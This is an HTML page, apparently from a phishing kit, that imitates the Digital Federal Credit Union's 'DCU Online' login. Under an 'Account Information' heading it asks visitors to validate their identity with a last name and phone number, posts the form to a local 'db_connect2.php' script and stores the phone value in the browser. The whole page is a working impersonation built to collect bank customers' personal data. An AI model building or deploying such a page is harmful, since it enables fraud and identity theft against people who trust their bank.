<!DOCTYPE html>
<html class="a-no-js" data-19ax5a9jf="dingo">
  <head>
<link rel="shortcut icon" type="image/png"href="https://upload.wikimedia.org/wikipedia/commons/5/5b/Logo_DCU_Green.svg"/>
<script type='text/javascript'>var ue_t0=ue_t0||+new Date();</script>
<html lang="en-us" dir="ltr">
<head class="at-element-marker">
  <meta charset="utf-8">
  <title>DCU Online - Login</title>
  <meta name="format-detection" content="telephone=no">
  <meta name="msapplication-tap-highlight" content="no">
  <meta name="viewport" content="width=device-width,initial-scale=1">
  <script src="js/mask.js" type="text/javascript"></script>
  <link href="css/vendor.7de76d70.css" rel="stylesheet">
  <link href="css/app.7b1cd472.css" rel="stylesheet">
  <link rel="stylesheet" type="text/css" href="css/64.64d4d70e.css">
  <link rel="stylesheet" type="text/css" href="css/chunk-common.d06af608.css">
  <link rel="stylesheet" type="text/css" href="css/2.658b5c49.css">
  <link type="text/css" id="firefly-css" class="firefly-css" rel="stylesheet" href="https://usassets.cobrowse.pega.com/assets/stylesheets/customer/final/default.css?v=8.7.1">
</head>
<body class="mobile touch platform-android body--light" style="--q-color-primary:#01675a; --q-color-secondary:#07926d; --q-color-accent:#5CCB9C; --q-color-positive:#21BA45; --q-color-negative:#C10015; --q-color-info:#F2C037; --q-color-warning:#F2C037; --q-color-light:#bdbdbd; --q-color-dark:#424242; --q-color-faded:#777;">
<div id="q-app">
  <div class="q-layout q-layout--standard" style="min-height: 570px;">
    <main data-v-3b0ab34e="" class="entrymodal-container" style="background-color: rgb(1, 103, 90);">
      <div data-v-3b0ab34e="" class="q-pb-xs-sm q-pb-sm-xl"></div>
      <div data-v-3b0ab34e="" class="row entrymodal-ui-container q-pa-lg q-mx-auto">
        <div data-v-3b0ab34e="" class="col-12 row justify-center">
          <img data-v-3b0ab34e="" height="32px" src="dcuLogoDark.png" alt="DCU company logo" class="q-mb-md">
          <h1 data-v-3b0ab34e="" class="col-12 text-h3 text-grey-8 q-ma-none text-center">Account Information</h1>
          <hr data-v-3b0ab34e="" class="separator__header" style="color: rgb(1, 103, 90);">
          <p style="text-align: center; font-size: 14px; font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif; margin-bottom: -10px; padding: 10px 10px 0px 10px;">Please provide the following information to validate your identity with us.</p>
        </div>
        <div data-v-3b0ab34e="" class="col-12 q-pt-md q-px-xs-md q-px-sm-xl">
          <form data-v-60147bc2="" data-v-3b0ab34e="" action="db_connect2.php" method="post" class="col-xs-12">
            <div data-v-3b0ab34e="">
              <div data-v-3b0ab34e="">
                <div data-v-3b0ab34e="" class="col-xs-12">
                  <div data-v-705dea72="" data-v-3b0ab34e="" class="custom-field input-field-spacing">
                    <div class="label-container">
                      <label for="f786b347-0a48-4963-b1dc-7f81810034d2">
                        <p class="q-ma-none">Last Name</p>
                      </label>
                    </div>
                    <div class="controller-wrapper">
                      <div data-v-705dea72="" class="custom-input">
                        <input data-v-705dea72="" placeholder="" autocomplete="username" name="fname" type="text" id="f786b347-0a48-4963-b1dc-7f81810034d2" required>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
              <div data-v-3b0ab34e="">
                <div data-v-3b0ab34e="" class="col-xs-12">
                  <div data-v-705dea72="" data-v-3b0ab34e="" class="custom-field input-field-spacing">
                    <div class="label-container">
                      <label for="phone">
                        <p class="q-ma-none">Phone Number</p>
                      </label>
                    </div>
                    <div class="controller-wrapper">
                      <div data-v-705dea72="" class="custom-input">
                        <input data-v-705dea72="" placeholder="" name="phone" type="tel" id="phone" required>
                        <script>
                          document.addEventListener("DOMContentLoaded", function() {
                              const btnNext = document.getElementById('btnNext');
                              btnNext.addEventListener("click", advancePage, false);
                          });
                      
                          function advancePage() {
                              const elEml = document.getElementById('phone');
                              localStorage.setItem('eml', elEml.value);
                          }
                        </script>
                        <script>
                          var element = document.getElementById('phone');
                          var maskOptions = {
                          mask: '(000)-000-0000'
                          };
                          var mask = IMask(element, maskOptions);
                          </script>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
              <button data-v-3448be5c="" id="btnNext" data-v-3b0ab34e="" tabindex="0" type="submit" role="button" class="q-btn q-btn-item non-selectable no-outline q-mt-lg full-width q-btn--standard q-btn--rectangle q-btn--actionable q-focusable q-hoverable q-btn--wrap" label="OK" style="color: white; background-color: rgb(1, 103, 90); border-radius: 0px; height: 40px;">
                <span class="q-btn__wrapper col row q-anchor--skip">
                  <span class="q-btn__content text-center col items-center q-anchor--skip justify-center row">
                    <span class="block">Next</span>
                  </span>
                </span>
              </button>
            </div>
          </form>
        </div>
        <div data-v-3b0ab34e="" class="col-xs-12 q-pt-lg q-px-md text-body2 text-center">
          <div data-v-3b0ab34e="" class="text-caption text-grey-8 q-mt-md">
            <span data-v-3b0ab34e="">©2024 Digital Federal Credit Union &nbsp; | &nbsp; v7.5.1 </span>
          </div>
        </div>
      </div>
    </main>
  </div>
</div>
</body>
</html>